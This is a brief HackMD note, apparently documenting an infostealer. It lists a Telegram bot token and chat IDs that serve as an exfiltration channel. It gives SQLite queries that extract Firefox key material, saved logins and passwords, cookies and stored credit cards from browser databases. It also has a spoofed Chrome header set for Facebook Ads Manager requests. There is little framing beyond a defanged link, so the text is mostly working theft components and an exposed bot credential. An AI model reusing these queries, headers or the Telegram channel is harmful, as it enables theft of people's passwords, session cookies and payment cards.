TG info

  1. TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
  2. CHAT_ID_NEW='-1002426006531'
  3. CHAT_ID_RESET='-1002489276039'
  4. https://t[.]me/Xmeta

sqlite 查詢語法

  1. SELECT item1, item2 FROM metadata;
  2. SELECT a11, a102 FROM nssPrivate WHERE a102 = b'\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01';
  3. SELECT action_url, username_value, password_value FROM logins
  4. SELECT host, path, name, value, isSecure, isHttpOnly, expiry FROM moz_cookies
  5. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards

headers = {'authority': 'adsmanager.facebook.com','accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','accept-language': 'vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5','cache-control': 'max-age=0','sec-ch-prefers-color-scheme': 'dark','sec-ch-ua': '"Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"','sec-ch-ua-full-version-list': '"Chromium";v="112.0.5615.140", "Google Chrome";v="112.0.5615.140", "Not:A-Brand";v="99.0.0.0"','sec-ch-ua-mobile': '?0','sec-ch-ua-platform': '"Windows"','sec-ch-ua-platform-version': '"15.0.0"','sec-fetch-dest': 'document','sec-fetch-mode': 'navigate','sec-fetch-site': 'same-origin','sec-fetch-user': '?1','upgrade-insecure-requests': '1','user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36','viewport-width': '794'}

Last changed by 
罐頭
0
472
Published on HackMD